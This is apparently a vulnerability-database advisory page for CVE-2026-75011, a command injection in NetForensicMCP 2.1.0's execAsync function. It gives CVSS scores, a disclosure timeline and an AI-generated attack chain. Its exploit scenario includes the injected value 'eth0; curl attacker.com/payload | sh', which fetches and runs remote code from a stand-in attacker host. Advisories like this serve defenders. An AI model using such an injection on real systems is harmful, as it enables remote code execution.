Skip to main content

NetForensicMCP CVE-2026-75011

| EUVDEUVD-2026-60325 LOW
Command Injection (CWE-77)
2026-08-17 VulDB GHSA-c3pm-fpfv-hvvx
2.1
CVSS 4.0 · Vendor: VulDB

Severity by source

Vendor (VulDB) PRIMARY
2.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
6.3 MEDIUM

Network-reachable with low privileges required (PR:L); no scope change and limited impact across all three pillars consistent with CVSS 4.0 VC:L/VI:L/VA:L/SC:N.

3.1 AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N

Primary rating from Vendor (VulDB).

CVSS VectorVendor: VulDB

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
X

Lifecycle Timeline

4
Severity Changed
Aug 17, 2026 - 19:22 NVD
MEDIUM LOW
CVSS changed
Aug 17, 2026 - 19:22 NVD
5.3 (MEDIUM) 2.1 (LOW)
Analysis Generated
Aug 17, 2026 - 19:06 vuln.today
CVE Published
Aug 17, 2026 - 18:15 cve.org
MEDIUM 5.3

DescriptionCVE.org

A flaw has been found in kylecui NetForensicMCP 2.1.0. Impacted is the function execAsync of the file index.js. Executing a manipulation of the argument interface/protocol can lead to command injection. The attack may be launched remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.

AnalysisAI

Remote command injection in kylecui NetForensicMCP 2.1.0 allows authenticated remote attackers to execute arbitrary OS commands by supplying shell metacharacters in the interface or protocol arguments passed to the execAsync function in index.js. A public proof-of-concept exists via a GitHub issue, though this vulnerability is not currently listed in CISA KEV, indicating no confirmed widespread exploitation at time of analysis. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Authenticate with low-privilege credentials
Delivery
Send crafted request to NetForensicMCP endpoint
Exploit
Inject shell metacharacters in interface or protocol argument
Execution
execAsync passes unsanitized input to OS shell
Impact
Arbitrary OS commands execute under NetForensicMCP process privileges

Vulnerability AssessmentAI

Exploitation Exploitation requires network-level access to a running NetForensicMCP 2.1.0 instance (AV:N per CVSS 4.0 vector) and a low level of authentication (PR:L), meaning the attacker must hold valid credentials or a session token sufficient to invoke the `execAsync` function - unauthenticated external attackers cannot directly exploit this flaw. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P) scores 5.3 Medium. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with low-privilege authenticated access to a NetForensicMCP 2.1.0 instance crafts a request containing a manipulated `interface` or `protocol` value such as `eth0; curl attacker.com/payload | sh` and submits it to the affected endpoint. The `execAsync` function in `index.js` interpolates the unsanitized argument directly into an OS shell command, causing the injected payload to execute with the privileges of the NetForensicMCP process. …
Remediation No vendor-released patch has been identified at time of analysis - the maintainer has not responded to the disclosure reported via GitHub issue #1. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-75011 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy